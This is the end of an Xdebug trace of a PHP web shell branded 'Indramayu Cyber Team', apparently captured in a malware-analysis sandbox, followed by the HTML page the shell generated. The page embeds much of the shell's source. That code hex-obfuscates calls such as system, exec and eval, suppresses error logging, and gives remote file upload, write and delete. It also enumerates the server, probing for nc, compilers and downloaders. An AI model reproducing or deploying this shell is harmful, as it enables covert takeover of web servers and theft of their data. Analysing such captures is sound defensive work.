3	1714	0	0.097689	631096	explode	0		/var/www/html/uploads/index.php	275	2	'>>'	'0664 >> -rw-rw-r--'
3	1714	1	0.097703	631616
3	1714	R			[0 => '0664 ', 1 => ' -rw-rw-r--']
2		A						/var/www/html/uploads/index.php	275	$perm = [0 => '0664 ', 1 => ' -rw-rw-r--']
3	1715	0	0.097731	631544	is_writable	0		/var/www/html/uploads/index.php	276	1	'/var/www/html/uploads/index.php'
3	1715	1	0.097748	631584
3	1715	R			FALSE
3	1716	0	0.097762	631544	is_readable	0		/var/www/html/uploads/index.php	278	1	'/var/www/html/uploads/index.php'
3	1716	1	0.097777	631584
3	1716	R			TRUE
2	1713	1	0.097791	631224
2	1713	R			'<font class=\'text-secondary\'>0664 </font> >> <font class=\'text-secondary\'> -rw-rw-r--</font>'
2	1717	0	0.097811	630992	file_get_contents	0		/var/www/html/uploads/index.php	639	1	'index.php'
2	1717	1	0.097846	663800
2	1717	R			'<?php\n\n$shellName = \'Indramayu Cyber Team\';\n$logo = \'https://1.bp.blogspot.com/-M0ZH5WcjeLk/YPHKrrDwwqI/AAAAAAAAALQ/UElzDOSvAwErnaFmd0hSxqxN6gCiC4-cwCLcBGAsYHQ/s320/images.jpeg\';\n$func = ["7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655'
2	1718	0	0.097946	663760	htmlspecialchars	0		/var/www/html/uploads/index.php	639	1	'<?php\n\n$shellName = \'Indramayu Cyber Team\';\n$logo = \'https://1.bp.blogspot.com/-M0ZH5WcjeLk/YPHKrrDwwqI/AAAAAAAAALQ/UElzDOSvAwErnaFmd0hSxqxN6gCiC4-cwCLcBGAsYHQ/s320/images.jpeg\';\n$func = ["7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655'
2	1718	1	0.098538	729328
2	1718	R			'&lt;?php\n\n$shellName = \'Indramayu Cyber Team\';\n$logo = \'https://1.bp.blogspot.com/-M0ZH5WcjeLk/YPHKrrDwwqI/AAAAAAAAALQ/UElzDOSvAwErnaFmd0hSxqxN6gCiC4-cwCLcBGAsYHQ/s320/images.jpeg\';\n$func = [&quot;7068705f756e616d65&quot;, &quot;70687076657273696f6e&quot;, &quot;676574637764&quot;, &quot;6368646972&quot;, &quot;707265675f73706c6974&quot;, &quot;61727261795f64696666&quot;, &quot;69735f646972&quot;, &quot;69735f66696c65&quot;, &quot;69735f7772697461626c65&quot;, &quot;69735f7265616461626c65&quot;, &qu'
2	1719	0	0.099470	631056	is_file	0		/var/www/html/uploads/index.php	628	1	'/var/www/html/uploads/prepend.php'
2	1719	1	0.099488	631104
2	1719	R			TRUE
2	1720	0	0.099504	631000	file_get_contents	0		/var/www/html/uploads/index.php	631	1	'prepend.php'
2	1720	1	0.099530	631136
2	1720	R			'<?php\nxdebug_start_trace("data/trace-".microtime(1));\n?>\n'
2	1721	0	0.099549	631096	htmlspecialchars	0		/var/www/html/uploads/index.php	631	1	'<?php\nxdebug_start_trace("data/trace-".microtime(1));\n?>\n'
2	1721	1	0.099567	631288
2	1721	R			'&lt;?php\nxdebug_start_trace(&quot;data/trace-&quot;.microtime(1));\n?&gt;\n'
2	1722	0	0.099586	631000	geticon	1		/var/www/html/uploads/index.php	631	1	'prepend.php'
3	1723	0	0.099600	631000	pathinfo	0		/var/www/html/uploads/index.php	304	2	'prepend.php'	4
3	1723	1	0.099615	631096
3	1723	R			'php'
3	1724	0	0.099629	631032	strtolower	0		/var/www/html/uploads/index.php	304	1	'php'
3	1724	1	0.099641	631064
3	1724	R			'php'
2		A						/var/www/html/uploads/index.php	304	$ext = 'php'
2	1722	1	0.099666	631000
2	1722	R			'file-code'
2	1725	0	0.099680	631000	checkName	1		/var/www/html/uploads/index.php	631	1	'prepend.php'
3	1726	0	0.099694	631000	strlen	0		/var/www/html/uploads/index.php	267	1	'prepend.php'
3	1726	1	0.099706	631032
3	1726	R			11
2	1725	1	0.099720	631000
2	1725	R			'prepend.php'
2	1727	0	0.099734	631000	function_exists	0		/var/www/html/uploads/index.php	632	1	'mime_content_type'
2	1727	1	0.099747	631040
2	1727	R			TRUE
2	1728	0	0.099761	631000	mime_content_type	0		/var/www/html/uploads/index.php	632	1	'prepend.php'
2	1728	1	0.100063	631072
2	1728	R			'text/x-php'
2	1729	0	0.100082	631040	checkName	1		/var/www/html/uploads/index.php	632	1	'text/x-php'
3	1730	0	0.100097	631040	strlen	0		/var/www/html/uploads/index.php	267	1	'text/x-php'
3	1730	1	0.100110	631072
3	1730	R			10
2	1729	1	0.100123	631040
2	1729	R			'text/x-php'
2	1731	0	0.100138	631000	filesize	0		/var/www/html/uploads/index.php	633	1	'prepend.php'
2	1731	1	0.100154	631016
2	1731	R			57
2	1732	0	0.100167	630976	formatSize	1		/var/www/html/uploads/index.php	633	1	57
2		A						/var/www/html/uploads/index.php	184	$types = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2		A						/var/www/html/uploads/index.php	185	$i = 0
3	1733	0	0.100206	630976	round	0		/var/www/html/uploads/index.php	186	2	57	2
3	1733	1	0.100219	631048
3	1733	R			57
2	1732	1	0.100234	631008
2	1732	R			'57 B'
2	1734	0	0.100249	630976	filemtime	0		/var/www/html/uploads/index.php	634	1	'prepend.php'
2	1734	1	0.100262	631016
2	1734	R			1676259933
2	1735	0	0.100275	630976	date	0		/var/www/html/uploads/index.php	634	2	'Y-m-d h:i:s'	1676259933
2	1735	1	0.100291	631304
2	1735	R			'2023-02-13 10:45:33'
2	1736	0	0.100306	630976	getowner	1		/var/www/html/uploads/index.php	635	1	'prepend.php'
3	1737	0	0.100319	630976	function_exists	0		/var/www/html/uploads/index.php	287	1	'posix_getpwuid'
3	1737	1	0.100336	631016
3	1737	R			TRUE
3	1738	0	0.100350	630976	fileowner	0		/var/www/html/uploads/index.php	288	1	'prepend.php'
3	1738	1	0.100363	631016
3	1738	R			0
3	1739	0	0.100375	630976	posix_getpwuid	0		/var/www/html/uploads/index.php	288	1	0
3	1739	1	0.100400	631776
3	1739	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/index.php	288	$downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/index.php	289	$downer = 'root'
3	1740	0	0.100453	631008	function_exists	0		/var/www/html/uploads/index.php	293	1	'posix_getgrgid'
3	1740	1	0.100467	631048
3	1740	R			TRUE
3	1741	0	0.100480	631008	filegroup	0		/var/www/html/uploads/index.php	294	1	'prepend.php'
3	1741	1	0.100493	631048
3	1741	R			0
3	1742	0	0.100506	631008	posix_getgrgid	0		/var/www/html/uploads/index.php	294	1	0
3	1742	1	0.100528	631664
3	1742	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/index.php	294	$dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/index.php	295	$dgrp = 'root'
2	1736	1	0.100574	631016
2	1736	R			'root/root'
2	1743	0	0.100589	631104	perms	1		/var/www/html/uploads/index.php	636	1	'/var/www/html/uploads/prepend.php'
3	1744	0	0.100603	631104	fileperms	0		/var/www/html/uploads/index.php	191	1	'/var/www/html/uploads/prepend.php'
3	1744	1	0.100619	631168
3	1744	R			33261
2		A						/var/www/html/uploads/index.php	191	$perms = 33261
2		A						/var/www/html/uploads/index.php	197	$info = '-'
2		A						/var/www/html/uploads/index.php	209	$info .= 'r'
2		A						/var/www/html/uploads/index.php	210	$info .= 'w'
2		A						/var/www/html/uploads/index.php	213	$info .= 'x'
2		A						/var/www/html/uploads/index.php	214	$info .= 'r'
2		A						/var/www/html/uploads/index.php	215	$info .= '-'
2		A						/var/www/html/uploads/index.php	218	$info .= 'x'
2		A						/var/www/html/uploads/index.php	219	$info .= 'r'
2		A						/var/www/html/uploads/index.php	220	$info .= '-'
2		A						/var/www/html/uploads/index.php	223	$info .= 'x'
3	1745	0	0.100738	631168	sprintf	0		/var/www/html/uploads/index.php	224	2	'%o'	33261
3	1745	1	0.100752	631552
3	1745	R			'100755'
3	1746	0	0.100765	631488	substr	0		/var/www/html/uploads/index.php	224	2	'100755'	-4
3	1746	1	0.100778	631584
3	1746	R			'0755'
2	1743	1	0.100792	631176
2	1743	R			'0755 >> -rwxr-xr-x'
2	1747	0	0.100806	631112	checkPerm	1		/var/www/html/uploads/index.php	636	2	'/var/www/html/uploads/prepend.php'	'0755 >> -rwxr-xr-x'
3	1748	0	0.100822	631112	explode	0		/var/www/html/uploads/index.php	275	2	'>>'	'0755 >> -rwxr-xr-x'
3	1748	1	0.100836	631632
3	1748	R			[0 => '0755 ', 1 => ' -rwxr-xr-x']
2		A						/var/www/html/uploads/index.php	275	$perm = [0 => '0755 ', 1 => ' -rwxr-xr-x']
3	1749	0	0.100865	631560	is_writable	0		/var/www/html/uploads/index.php	276	1	'/var/www/html/uploads/prepend.php'
3	1749	1	0.100882	631600
3	1749	R			FALSE
3	1750	0	0.100896	631560	is_readable	0		/var/www/html/uploads/index.php	278	1	'/var/www/html/uploads/prepend.php'
3	1750	1	0.100912	631600
3	1750	R			TRUE
2	1747	1	0.100926	631240
2	1747	R			'<font class=\'text-secondary\'>0755 </font> >> <font class=\'text-secondary\'> -rwxr-xr-x</font>'
2	1751	0	0.100945	631000	file_get_contents	0		/var/www/html/uploads/index.php	639	1	'prepend.php'
2	1751	1	0.100971	631136
2	1751	R			'<?php\nxdebug_start_trace("data/trace-".microtime(1));\n?>\n'
2	1752	0	0.100990	631096	htmlspecialchars	0		/var/www/html/uploads/index.php	639	1	'<?php\nxdebug_start_trace("data/trace-".microtime(1));\n?>\n'
2	1752	1	0.101007	631288
2	1752	R			'&lt;?php\nxdebug_start_trace(&quot;data/trace-&quot;.microtime(1));\n?&gt;\n'
1	3	1	0.101253	631000
			0.101302	389072
TRACE END   [2023-02-13 01:45:59.299849]


Generated HTML code

<html lang="en"><head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-+0n0xVW2eSR5OomGNYDnhzAbDsOXxcvSN1TPprVMTNDbiYZCxYbOOl7+AMvyTG2x" crossorigin="anonymous">
	<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous">
	<title>Indramayu Cyber Team</title>
</head>
<body>
	<div class="container-lg">
		
		<nav class="navbar navbar-light bg-light">
			<div class="container-fluid">
				<a class="navbar-brand" href="?">
					<img src="https://1.bp.blogspot.com/-M0ZH5WcjeLk/YPHKrrDwwqI/AAAAAAAAALQ/UElzDOSvAwErnaFmd0hSxqxN6gCiC4-cwCLcBGAsYHQ/s320/images.jpeg" alt="logo" width="30" height="24" class="d-inline-block align-text-top">
					Indramayu Cyber Team				</a>
			</div>
		</nav>
		
		
		<div id="tool">
			<div class="d-flex justify-content-center flex-wrap my-3">
				<a href="?" class="m-1 btn btn-outline-dark btn-sm"><i class="fa fa-home"></i> Home</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#upload" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-upload"></i> Upload</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#newfile" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-file-plus"></i> New File</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#newfolder" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-folder-plus"></i> New Folder</a>
			</div>
			
			<div class="row">
				<div class="col-md-12">
					<div class="collapse" id="upload" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								 <div class="col-md-6">
									<form action="" method="post" enctype="multipart/form-data">
										<div class="input-group">
											<input type="file" class="form-control" name="uploadfile[]" id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload">
											<button class="btn btn-outline-dark" type="submit" id="inputGroupFileAddon04">Upload</button>
										</div>
									</form>
								 </div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="newfile" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<form action="" method="post">
										<div class="mb-3">
											<label class="form-label">File Name</label>
											<input type="text" class="form-control" name="filename" placeholder="./sToryAn9el.txt">
										</div>
										<div class="mb-3">
											<label class="form-label">File Content</label>
											<textarea class="form-control" rows="5" name="filecontent"></textarea>
										</div>
										<button type="submit" class="btn btn-outline-dark">Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="newfolder" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<form action="" method="post">
										<div class="mb-3">
											<label class="form-label">Folder Name</label>
											<input type="text" class="form-control" name="foldername" placeholder="./sToryAn9el">
										</div>
										<button type="submit" class="btn btn-outline-dark">Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>

		<div class="row">
			<div class="col-md-12">
				<div class="card border-dark">
					<div class="card-body">
						<h5><i class="fa fa-server"></i> Server Information </h5>
						<div class="table-responsive">
							<table class="table table-hover text-nowrap">
								<tbody><tr>
									<td>Operating System</td>
									<td> : Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</td>
								</tr>
								<tr>
									<td>User / Group</td>
									<td> : 33[www-data] / 33[www-data]</td>
								</tr>
								<tr>
									<td>PHP Version</td>
									<td> : 7.2.34-37+ubuntu22.04.1+deb.sury.org+1</td>
								</tr>
								<tr>
									<td>IP Server</td>
									<td> : ::1</td>
								</tr>
								<tr>
									<td>Storage</td>
									<td class="d-flex">: Total = 216.08 GB, Free = 182.01 GB [84%]</td>
								</tr>
								<tr>
									<td>Domains</td>
									<td>: <font class="text-danger">Can't Read /etc/named.conf</font></td>
								</tr>
								<tr>
									<td>Software</td>
									<td>: Apache/2.4.52 (Ubuntu)</td>
								</tr>
								<tr>
									<td>Disable Functions</td>
									<td>: <font class="text-danger">pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,</font></td>
								</tr>
								<tr>
									<td>Useful Functions</td>
									<td>: gcc, cc, ld, make, php, perl, tar, gzip, nc</td>
								</tr>
								<tr>
									<td>Downloader</td>
									<td>: wget, curl, lwp-mirror</td>
								</tr>
								<tr>
									<td colspan="2">CURL : <font class="text-success">ON</font> | SSH2 : <font class="text-danger">OFF</font> | Magic Quotes : <font class="text-success">ON</font> | MySQL : <font class="text-danger">OFF</font> | MSSQL : <font class="text-danger">OFF</font> | PostgreSQL : <font class="text-danger">OFF</font> | Oracle : <font class="text-danger">OFF</font></td>
								</tr>
								<tr>
									<td colspan="2">Safe Mode : <font class="text-danger">OFF</font> | Open Basedir : <font class="text-warning">NONE</font> | Safe Mode Exec Dir : <font class="text-warning">NONE</font> | Safe Mode Include Dir : <font class="text-warning">NONE</font></td>
								</tr>
							</tbody></table>
						</div>
					</div>
				</div>
			</div>
			<div class="col-md-12 my-3">
				<div class="card border-dark">
					<div class="card-body">
						<h5><i class="fa fa-wave-square"></i> Path </h5>
						<nav aria-label="breadcrumb" style="--bs-breadcrumb-divider: '>';">
							<ol class="breadcrumb">
								<li class="breadcrumb-item"><a class="text-decoration-none text-dark" href="?dir=/">/</a></li><li class="breadcrumb-item"><a class="text-decoration-none text-dark" href="?dir=/var">var</a></li><li class="breadcrumb-item"><a class="text-decoration-none text-dark" href="?dir=/var/www">www</a></li><li class="breadcrumb-item active" aria-current="page">html</li>							</ol>
						</nav>
						[ <font class="text-success">0777 </font> &gt;&gt; <font class="text-success"> drwxrwxrwx</font> ]
					</div>
				</div>
			</div>
			<div class="col-md-12" id="main">
				<div class="card border-dark overflow-auto">
					<div class="card-body">
						<h5><i class="fa fa-archive"></i> Files Manager</h5>
																					<div class="table-responsive">
									<table class="table table-hover text-nowrap">
										<thead>
											<tr>
												<th>Name</th>
												<th>Type</th>
												<th>Size</th>
												<th>Last Modified</th>
												<th>Owner/Group</th>
												<th>Permission</th>
												<th>Action</th>
											</tr>
										</thead>
										<tbody>
																							<tr>
													<td>
																												<a href="?dir=/var/www/html" class="text-decoration-none text-dark"><i class="fa fa-folder-open"></i> .</a>
																											</td>
													<td>dir</td>
													<td class="align-middle">--</td>
													<td>2023-02-13 10:45:26</td>
													<td>root/root</td>
													<td><font class="text-success">0777 </font> &gt;&gt; <font class="text-success"> drwxrwxrwx</font></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1"><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1"><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
																							<tr>
													<td>
																												<a href="?dir=/var/www" class="text-decoration-none text-dark"><i class="fa fa-folder-open"></i> ..</a>
																											</td>
													<td>dir</td>
													<td class="align-middle">--</td>
													<td>2023-02-13 10:45:26</td>
													<td>root/root</td>
													<td><font class="text-success">0777 </font> &gt;&gt; <font class="text-success"> drwxrwxrwx</font></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1"><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1"><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
																																		<tr>
													<td><a data-bs-toggle="modal" href="#viewModal" role="button" data-bs-name="beneri.se_malware_analysis" data-bs-content="" class="text-dark text-decoration-none"><i class="fa fa-file"></i> beneri.se_malware_...</a></td>
													<td>inode/x-empty</td>
													<td>0 B</td>
													<td>2023-02-13 10:45:26</td>
													<td>root/root</td>
													<td><font class="text-secondary">0644 </font> &gt;&gt; <font class="text-secondary"> -rw-r--r--</font></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#renameModal" data-bs-name="beneri.se_malware_analysis"><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#viewModal" data-bs-name="beneri.se_malware_analysis" data-bs-content=""><i class="fa fa-file-signature"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#downloadModal" data-bs-file="/var/www/html/beneri.se_malware_analysis"><i class="fa fa-download"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#deleteModal" data-bs-file="/var/www/html/beneri.se_malware_analysis"><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
																							<tr>
													<td><a data-bs-toggle="modal" href="#viewModal" role="button" data-bs-name="index.php" data-bs-content="<?php

$shellName = 'Indramayu Cyber Team';
$logo = 'https://1.bp.blogspot.com/-M0ZH5WcjeLk/YPHKrrDwwqI/AAAAAAAAALQ/UElzDOSvAwErnaFmd0hSxqxN6gCiC4-cwCLcBGAsYHQ/s320/images.jpeg';
$func = [&quot;7068705f756e616d65&quot;, &quot;70687076657273696f6e&quot;, &quot;676574637764&quot;, &quot;6368646972&quot;, &quot;707265675f73706c6974&quot;, &quot;61727261795f64696666&quot;, &quot;69735f646972&quot;, &quot;69735f66696c65&quot;, &quot;69735f7772697461626c65&quot;, &quot;69735f7265616461626c65&quot;, &quot;66696c6573697a65&quot;, &quot;636f7079&quot;, &quot;66696c655f657869737473&quot;, &quot;66696c655f7075745f636f6e74656e7473&quot;, &quot;66696c655f6765745f636f6e74656e7473&quot;, &quot;6d6b646972&quot;, &quot;72656e616d65&quot;, &quot;737472746f74696d65&quot;, &quot;68746d6c7370656369616c6368617273&quot;, &quot;64617465&quot;, &quot;66696c656d74696d65&quot;, &quot;7363616e646972&quot;, &quot;73797374656d&quot;, &quot;65786563&quot;, &quot;7061737374687275&quot;, &quot;7368656c6c5f65786563&quot;, &quot;6f625f6765745f636f6e74656e7473&quot;, &quot;6f625f656e645f636c65616e&quot;, &quot;6469726e616d65&quot;, &quot;6469736b5f746f74616c5f7370616365&quot;, &quot;6469736b5f667265655f7370616365&quot;, &quot;696e695f676574&quot;, &quot;707265675f6d617463685f616c6c&quot;, &quot;706f7369785f6765747077756964&quot;, &quot;706f7369785f6765746772676964&quot;, &quot;70617468696e666f&quot;, &quot;66696c656f776e6572&quot;, &quot;66696c6567726f7570&quot;, &quot;66696c6574797065&quot;, &quot;676574486f73744e616d65&quot;, &quot;676574486f737442794e616d65&quot;, &quot;737562737472&quot;, &quot;737472737472&quot;, &quot;696e695f736574&quot;, &quot;66696c65&quot;, &quot;7374725f7265706c616365&quot;, &quot;6578706c6f6465&quot;, &quot;6576616c&quot;, &quot;6f625f7374617274&quot;, &quot;66756e6374696f6e5f657869737473&quot;, &quot;6572726f725f7265706f7274696e67&quot;, &quot;7365745f74696d655f6c696d6974&quot;, &quot;636c656172737461746361636865&quot;, &quot;646174655f64656661756c745f74696d657a6f6e655f736574&quot;, &quot;666c757368&quot;, &quot;7374726c656e&quot;, &quot;7472696d&quot;, &quot;656d707479&quot;, &quot;6973736574&quot;, &quot;66696c657065726d73&quot;, &quot;7374726c656e&quot;, &quot;636f756e74&quot;, &quot;726f756e64&quot;, &quot;6d696d655f636f6e74656e745f74797065&quot;, &quot;6765745f63757272656e745f75736572&quot;, &quot;6765746d79756964&quot;, &quot;6765746d79676964&quot;, &quot;706f7369785f67657465756964&quot;, &quot;706f7369785f67657465676964&quot;];

for ($i = 0; $i < count($func); $i++) {
	$func[$i] = dehex($func[$i]);
}

session_start();
$func[50](0);
@$func[51](0);
@$func[52]();
@$func[43]('error_log', null);
@$func[43]('log_errors',0);
@$func[43]('max_execution_time',0);
@$func[43]('output_buffering',0);
@$func[43]('display_errors', 0);
$func[53](&quot;Asia/Jakarta&quot;);

if (isset($_GET['dir'])) {
	$dir = $_GET['dir'];
	$func[3]($dir);
} else {
	$dir = $func[2]();
}
	
$d0mains = @$func[44](&quot;/etc/named.conf&quot;, false);
if (!$d0mains) {
	$dom = &quot;<font class='text-danger'>Can't Read /etc/named.conf</font>&quot;;
} else { 
	$count = 0;
	foreach ($d0mains as $d0main) {
		if (@$func[43]($d0main, &quot;zone&quot;)) {
			$func[32]('#zone &quot;(.*)&quot;#', $d0main, $domains);
			$func[54]();
			if ($func[55]($func[56]($domains[1][0])) > 2){
				$func[54]();
				$count++;
			}
		}
	}
	$dom = &quot;<font class='text-success'>$count Domain</font>&quot;;
}

$dir = $func[45](&quot;\\&quot;, &quot;/&quot;, $dir);
$scdir = $func[46](&quot;/&quot;, $dir);
$total = $func[29]($dir);
$free = $func[30]($dir);
$pers =  (int) ($free / $total * 100);
$ds = @$func[31](&quot;disable_functions&quot;);
$show_ds = (!empty($ds)) ? &quot;<font class='text-danger'>$ds</font>&quot; : &quot;<font class='text-success'>All function is accessible</font>&quot;;

$cmd_uname = exe(&quot;uname -a&quot;);
$uname = $func[49]('php_uname') ? $func[41](@$func[0](), 0, 120) : ($func[55]($cmd_uname) > 0 ? $cmd_uname : '( php_uname ) Function Disabled !');

if (strtolower($func[41](PHP_OS, 0, 3)) == &quot;win&quot;) {
	$sys = &quot;win&quot;;
} else {
	$sys = &quot;unix&quot;;
}

if (isset($_GET['do'])) {
	$do = $_GET['do'];
	if ($do == 'delete') {
		if ($func[12]($dir)) {
			if (deleter($dir)) {
				flash(&quot;File/Folder deleted successfully!&quot;, &quot;Success&quot;, &quot;success&quot;, &quot;?dir=&quot; . dirname($dir));
			} else {
				flash(&quot;File/Folder failed to delete!&quot;, &quot;Failed&quot;, &quot;danger&quot;);
			}
		} else {
			flash(&quot;File/Folder is doesn't exist!&quot;, &quot;Failed&quot;, &quot;warning&quot;);
		}
	} else if ($do == 'download') {
		if ($func[12]($dir)) {
			header(&quot;Content-Type: application/octet-stream&quot;);
			header(&quot;Content-Transfer-Encoding: Binary&quot;);
			header(&quot;Content-Length: &quot; . $func[10]($dir));
			header(&quot;Content-disposition: attachment; filename=\&quot;&quot;.basename($dir).&quot;\&quot;&quot;);
		} else {
			flash(&quot;File is doesn't exist!&quot;, &quot;Failed&quot;, &quot;warning&quot;);
		}
	}
} else {
	$do = 'filesman';
	$title = 'Files Manager';
	$icon = 'archive';
}

((isset($_POST[&quot;foldername&quot;])) ? ($func[12](&quot;$dir/{$_POST['foldername']}&quot;) ? flash(&quot;Folder name is exist!&quot;, &quot;Failed&quot;, &quot;warning&quot;) : ($func[15](&quot;$dir/{$_POST['foldername']}&quot;) ? flash(&quot;Folder created successfully!&quot;, &quot;Success&quot;, &quot;success&quot;) : flash(&quot;Folder failed to create!&quot;, &quot;Failed&quot;, &quot;danger&quot;))) : null);

((isset($_POST[&quot;filename&quot;]) &amp;&amp; isset($_POST['filecontent'])) ? ($func[12](&quot;$dir/{$_POST['filename']}&quot;) ? flash(&quot;File name is exist!&quot;, &quot;Failed&quot;, &quot;warning&quot;) : ($func[13](&quot;$dir/{$_POST['filename']}&quot;, $_POST['filecontent']) ? flash(&quot;File created successfully!&quot;, &quot;Success&quot;, &quot;success&quot;) : flash(&quot;File failed to create!&quot;, &quot;Failed&quot;, &quot;danger&quot;))) : null);

((isset($_POST[&quot;newname&quot;]) &amp;&amp; isset($_POST['oldname'])) ? ($func[12](&quot;$dir/{$_POST['newname']}&quot;) ? flash(&quot;File/Folder name is exist!&quot;, &quot;Failed&quot;, &quot;warning&quot;) : ($func[16](&quot;$dir/{$_POST['oldname']}&quot;, $_POST['newname']) ? flash(&quot;File/Folder renamed successfully!&quot;, &quot;Success&quot;, &quot;success&quot;) : flash(&quot;File/Folder failed to rename!&quot;, &quot;Failed&quot;, &quot;danger&quot;))) : null);

((isset($_POST[&quot;filename&quot;]) &amp;&amp; isset($_POST['content'])) ? ($func[13](&quot;$dir/{$_POST['filename']}&quot;, $_POST['content']) ? flash(&quot;File saved successfully!&quot;, &quot;Success&quot;, &quot;success&quot;) : flash(&quot;File failed to save!&quot;, &quot;Failed&quot;, &quot;danger&quot;)) : null);

if (isset($_FILES[&quot;uploadfile&quot;])) {
	$n = $_FILES[&quot;uploadfile&quot;][&quot;name&quot;];
	for ($i = 0; $i < count($n); $i++) {
		if ($func[11]($_FILES[&quot;uploadfile&quot;][&quot;tmp_name&quot;][$i], $n[$i])) {
			flash(&quot;File uploaded successfully!&quot;, &quot;Success&quot;, &quot;success&quot;);
		} else {
			flash(&quot;File failed to upload!&quot;, &quot;Failed&quot;, &quot;danger&quot;);
		}
	}
}

if (@$func[31]('open_basedir')) {
	$basedir_data = @$func[31]('open_basedir');
	if ($func[55]($basedir_data) > 120){
		$open_b = &quot;<font class='text-success'>&quot; . $func[41]($basedir_data, 0, 120) . &quot;...</font>&quot;;
	} else {
		$open_b = '<font class=&quot;text-success&quot;>' . $basedir_data . '</font>';
	}
} else {
	$open_b = '<font class=&quot;text-warning&quot;>NONE</font>';
}

if (!$func[49]('posix_getegid')) {
	$user = $func[49](&quot;get_current_user&quot;) ? @$func[64]() : &quot;????&quot;;
	$uid = $func[49](&quot;getmyuid&quot;) ? @$func[65]() : &quot;????&quot;;
	$gid = $func[49](&quot;getmygid&quot;) ? @$func[66]() : &quot;????&quot;;
	$group = &quot;?&quot;;
} else {
	$uid = $func[49](&quot;posix_getpwuid&quot;) &amp;&amp; $func[49](&quot;posix_geteuid&quot;) ? @$func[33]($func[67]()) : [&quot;name&quot; => &quot;????&quot;, &quot;uid&quot; => &quot;????&quot;];
	$gid = $func[49](&quot;posix_getgrgid&quot;) &amp;&amp; $func[49](&quot;posix_getegid&quot;) ? @$func[34]($func[68]()) : [&quot;name&quot; => &quot;????&quot;, &quot;gid&quot; => &quot;????&quot;];
	$user = $uid['name'];
	$uid = $uid['uid'];
	$group = $gid['name'];
	$gid = $gid['gid'];
}

if ($sys == 'unix') {
	if (!@$func[31]('safe_mode')) {
		if ($func[55](exe(&quot;id&quot;)) > 0) {
			$userful = ['gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl'];
			$x = 0;
			foreach ($userful as $i) {
				if (which($i)) {
					$x++;
					$useful .= $i . ', ';
				}
			}
			if ($x == 0) {
				$useful = '--------';
			}
			$downloaders = ['wget','fetch','lynx','links','curl','get','lwp-mirror'];
			$x = 0;
			foreach($downloaders as $i) {
				if (which($i)) {
					$x++;
					$downloader .= $i . ', ';
				}
			}
			if ($x == 0) {
				$downloader = '--------';
			}
		}
	}
}

function hex($str) {
	global $func;
